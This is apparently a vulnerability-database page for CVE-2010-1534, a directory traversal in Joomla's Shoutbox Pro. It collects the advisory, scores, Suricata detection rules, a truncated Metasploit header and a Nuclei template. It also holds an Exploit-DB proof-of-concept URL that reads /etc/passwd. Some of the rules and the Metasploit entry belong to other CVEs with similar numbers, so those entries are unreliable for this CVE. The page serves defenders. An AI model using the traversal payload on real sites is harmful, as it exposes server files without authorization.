CVE-2010-1534
published 2010-04-26CVE-2010-1534: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP339medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
13.62%
96.0th percentile
Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla.batjo | com_shoutbox | — | — |
| joomla.batjo | com_shoutbox | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion
suricata·2010-07-30·CVSS 7.5
CVE-2008-1534 [HIGH] ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion
ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PowerPHPBoard footer.inc.php settings Parameter Local File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/footer.inc.php?"; nocase; content:"settings[footer]="; fast_pattern; nocase; http.uri.raw; url_decode; content:"|2e 2e 2f|"; reference:url,milw0rm.com/exploits/5303; reference:url,juniper.net/security/auto/vulnerabilities/vuln28421.html; reference:bugtraq,28421; reference:cve,CVE-2008-1534; classtype:web-application-attack; sid:2009659; rev:8; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2010_07_30, deployment Perimeter, deployment Inte
Suricata
ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion
suricata·2010-07-30·CVSS 7.5
CVE-2008-1534 [HIGH] ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion
ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PowerPHPBoard header.inc.php settings Parameter Local File Inclusion"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/header.inc.php?"; fast_pattern; nocase; content:"settings[header]="; nocase; http.uri.raw; url_decode; content:"|2e 2e 2f|"; reference:url,milw0rm.com/exploits/5303; reference:url,juniper.net/security/auto/vulnerabilities/vuln28421.html; reference:bugtraq,28421; reference:cve,CVE-2008-1534; classtype:web-application-attack; sid:2009660; rev:8; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2010_07_30, deployment Perimeter, deployment Inte
Exploit-DB
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
exploitdb·2010-04-30
CVE-2009-1534 Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
---
##
# $Id: ms09_043_owc_htmlurl.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft OWC Spreadsheet HTMLURL Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Microsoft's Office Web Components.
When passing an overly long string as the "HTMLURL" parameter an attacker can
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'Version' => '$Revision: 9179 $',
'Reference
Exploit-DB
Joomla! Component Shoutbox Pro - Local File Inclusion
exploitdb·2010-04-05
CVE-2010-1534 Joomla! Component Shoutbox Pro - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion
---
Title : Joomla Component com_shoutbox LFI Vulnerability
Download : http://joomlacode.org/gf/project/shoutbox
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_shoutbox&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component Shoutbox Pro - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1534 [MEDIUM] Joomla! Component Shoutbox Pro - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion
A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1534
info:
name: Joomla! Component Shoutbox Pro - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Unauthenticated attackers can exploit directory traversal through the controller parameter to read arbitrary files from Joomla servers running vulnerable Shoutbox Pro components.
remedia
http://osvdb.org/63562http://secunia.com/advisories/39352http://www.exploit-db.com/exploits/12067http://www.securityfocus.com/bid/39213https://exchange.xforce.ibmcloud.com/vulnerabilities/57534http://osvdb.org/63562http://secunia.com/advisories/39352http://www.exploit-db.com/exploits/12067http://www.securityfocus.com/bid/39213https://exchange.xforce.ibmcloud.com/vulnerabilities/57534
2010-04-26
Published